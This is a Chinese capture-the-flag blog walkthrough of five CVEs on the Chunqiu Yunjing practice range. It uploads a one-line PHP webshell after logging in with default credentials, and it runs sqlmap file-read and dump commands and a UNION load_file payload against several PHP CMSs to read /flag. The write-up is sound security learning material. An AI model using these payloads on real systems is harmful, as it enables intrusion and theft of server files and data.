首页 > 其他分享 >春秋云镜靶场系列3

春秋云镜靶场系列3

时间:2023-07-24 23:44:44浏览次数:40  
标签:sqlmap 春秋 -- 云镜 flag 靶场 php 注入

春秋云镜靶场系列

靶场地址 https://yunjing.ichunqiu.com/

 

第一章. CVE-2022-30887

1.1. 靶标介绍:

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

1.2. 靶场复现

进入靶场,发现是一个登录框,老规矩想到尝试其默认密码、社工密码、爆破弱口令。

 

前端限制

 

百度一番发现需要根据下面的作者来寻找其弱口令,点击跳转。

 

 

下载cms的地址; https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download

 

 

还是个印度的,下载搭建环境后,可以查看对应的数据库文件发现默认·账号密码如下:

email:[email protected]
passwd:mayurik

也就是图片里的邮箱以及域名

进入后台后Medicine里面add可以上传一句话木马

<?php system($_GET["dreamer"]);?>

其他内容随便填

 

右键复制访问图片地址,执行payload

 

flag{17f10209-71fc-4fa2-b3ba-62192258795a}

第二章. CVE-2022-28060

2.1. 靶标介绍:

Victor CMS v1.0 /includes/login.php 存在sql注入

2.2. 靶场复现

进入靶场看到右侧有登录框,尝试弱口令爆破未果,

 

根据题目提示,猜测是登录框的SQL注入,于是访问URL,在登录过程中抓包:

 

burp post请求可以存文本注入,将请求包保存为1.txt,使用Sqlmap获取flag

sqlmap -r 1.txt --file-read "/flag" --dbms mysql

这里可以选择这样直接爆破出我们需要的文件,因为春秋云境靶场的flag文件基本在根目录下,所以在这里的/flag代表的就是根目录下的flag文件,就是绝对路径。

1:SQLMAP可以从一个文本文件中获取HTTP请求,根据这个文本文件我们可以不设置其他参数,譬如Cookie,POST等,对文本中的Web数据包进行分析注入

2:file-read: SQLmap --file-read从服务器中读取文件

当用户权限足够大并且具有特定的函数,即可读取服务器中的文件,可以是文本,也可以是二进制文件

3:dbms mysql 指定数据库类型

 

吐槽一句,电脑四年前垃圾机子了,再加上是虚拟机等得有点久,爆破出来之后,选择y生成文件,然后根据给的路径访问生成的文件,拿到flag

 

flag{2a0d4edf-2b99-46a0-96c1-1d850dd30197} 

第三章. CVE-2022-28512

3.1. 靶标介绍:

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。

3.2. 靶场复现

进入靶场

 

根据提示构造url,访问/single.php?id=1并使用burp抓包,并记录下需要的参数。使用cookie参数可以绕过身份验证,添加user-agent参数可以绕过客户端验证,否则可能会被识别到明显的sqlmap客户端标识,从而导致攻击的中断。这官方的方法。但个人试过可以直接使用sqlmap来跑。

 

加单引号看到报错,猜测存在数字型注入。

爆库名:

sqlmap -u "http://eci-2zebadqvxrplddjge214.cloudeci1.ichunqiu.com/single.php?id=1" --batch –dbs

 

爆表名:--batch -D "ctf" --tables

 

爆字段:--batch -D "ctf" -T "flag" --dump

 

flag{3eca36a9-c1e4-4bd3-9647-097a42457e3d}

第四章. CVE-2022-24223

4.1. 靶标介绍:

AtomCMS SQL注入漏洞

4.2. 靶场复现

进入靶场

 

寻找后台,先试常见后台目录,实在不行就御剑啥的爆目录,admin/login.php

 

开启BP抓包,随便填写用户名密码信息,点击submit。将请求包保存为1.txt

 

爆库:sqlmap -r 1.txt  --dbs  

 

爆表名:--batch -D atomcms --tables

 

爆字段:--batch -D atomcms -T flag --dump

 

flag{284b0eae-e73e-42b6-8d87-38011ca2cd35}

第五章. CVE-2022-25488

5.1. 靶标介绍:

Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面

5.2. 靶场复现

一进入靶场看到个报错界面

 

根据题目提示可以查看/admin/ajax路径

 

看到目标,但一打开空白。尝试是否是数字型注入。

 

 

添加id=1,再次看还是空白页面,但是此时再看源码,就会发现发生了变化,即存在数字型注入。

 

掏出sqlmap,也直接利用load_file进行flag读取:

http://eci-2ze0ve04ldakkeucjiy1.cloudeci1.ichunqiu.com:80/admin/ajax/avatar.php?id=-1+union+(select+load_file(%27/flag%27))%23

 

查看源代码

 

flag{d53d2751-c7b9-485b-b7f4-7027b3359fd4}

 

(后面应该不更新这个系列的了),原因看后面的春招贴吧。其实随笔里面的所有靶场基本上都是在安服仔前期实习或者实习前写的旧货了。现在时间挺多也无聊,于是就更新了。

要是这些靶场对你有帮助,不妨道友画板娘那赏点银子,(嘻嘻)发出懒洋洋的声音。

 

标签:sqlmap,春秋,--,云镜,flag,靶场,php,注入
From: https://www.cnblogs.com/Hndreamer/p/17578655.html

相关文章

  • 春秋云镜靶场系列2
    第一章.taoCMSv3.0.2任意文件上传漏洞1.1.描述1.2.复现过程路径:http://eci-2zec1bg9zctph4mkxyr8.cloudeci1.ichunqiu.com:80 弱口令admin/tao登录 在文件管理处,点击.htaccess,在后边添加一句AddTypeapplication/x-httpd-php.jpg意思是将.jpg后缀的文件当作php......
  • 春秋云镜靶场系列1
    春秋云镜靶场系列春秋云境.com是永信至诚基于多年来在网络靶场领域的深厚技术及场景积累,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,广泛支撑个人、企业、学校、科研院所等各类社会......
  • HTB靶场之OnlyForYou
    准备:攻击机:虚拟机kali。靶机:OnlyForYou,htb网站:https://www.hackthebox.com/,靶机地址:https://app.hackthebox.com/machines/OnlyForYou。知识点:DNS解析、代码审计、文件包含、shell反弹、frp端口转发、Neo4j注入漏洞、ngnix知识了解、md5解密、pip3download提权。简单的记录......
  • Bandit靶场攻略实况
    Bandit靶场攻略实况前言:在开始攻略Bandit之前,我在这里给大家介绍一个学习linux命令的宝藏网站,有什么命令不懂,可以马上翻阅此网站!非常实用!网址:https://www.runoob.com/linux/linux-command-manual.html1. 打开MobaXterm终端模拟器,选择session2. 选择SSH,“Remotehost”为......
  • bWAPP靶场搭建(phpstudy)
    我目前只打算在windows上使用该靶场,所以只看了windows中phpstudy搭建的教程,如果使用linux的docker,那更方便,phpstudy搭建bWAPP靶场的具体过程可以参考以下两位大佬:无mysql冲突的情况:https://www.cnblogs.com/zzjdbk/p/12981726.html有mysql冲突的情况:https://blog.csdn.net/we......
  • HTB靶场之Sandworm
    准备:攻击机:虚拟机kali。靶机:Sandworm,htb网站:https://www.hackthebox.com/,靶机地址:https://app.hackthebox.com/machines/Sandworm。知识点:SSTI注入、firejail提权、DNS解析、PGP解密、敏感信息发现、shell反弹。一:信息收集1.nmap扫描使用nmap对10000内的端口进行扫描,命令:sud......
  • xss-labs靶场1-20关详解
    靶场下载链接https://github.com/do0dl3/xss-labs在线靶场https://xssaq.com/yx/Level1(直接注入)源码<!DOCTYPEhtml><!--STATUSOK--><html><head><metahttp-equiv="content-type"content="text/html;charset=utf-8"><scr......
  • upload-labs靶场1-19关详解
    upload-labs靶场下载地址https://gitcode.net/mirrors/tj1ngwe1/upload-labs?utm_source=csdn_github_accelerator需要新建一个upload文件夹,该靶场在php5.2.17版本下(除特殊说明的情况下)。Pass-01(前端验证绕过)先上传一个php文件看一下回显然后上传一个正常文件,发现回显正......
  • 求推荐丨想提升实战技能,寻找靠谱的网络靶场!
    背景介绍:自学网络安全知识,具备一定的理论基础,缺乏实战经验,想去网络靶场体验一下,通过实操能快速提升实战技能!可推荐的网络靶场:经过对比后,发现春秋云境.com漏洞靶标多,类型丰富,最重要的是完成注册就能快速上手,就它了!春秋云境com介绍作为首家云上靶场,基于平行仿真技术的成熟应用......
  • docker配置阿里云镜像加速器
      首先登录阿里云服务器,每个账号都有一个镜像加速地址,并且这个地址可以共用 sudomkdir-p/etc/dockersudotee/etc/docker/daemon.json<<-'EOF'{"registry-mirrors":["https://6e4l5boa.mirror.aliyuncs.com"]}EOFsudosystemctldaemon-reloadsud......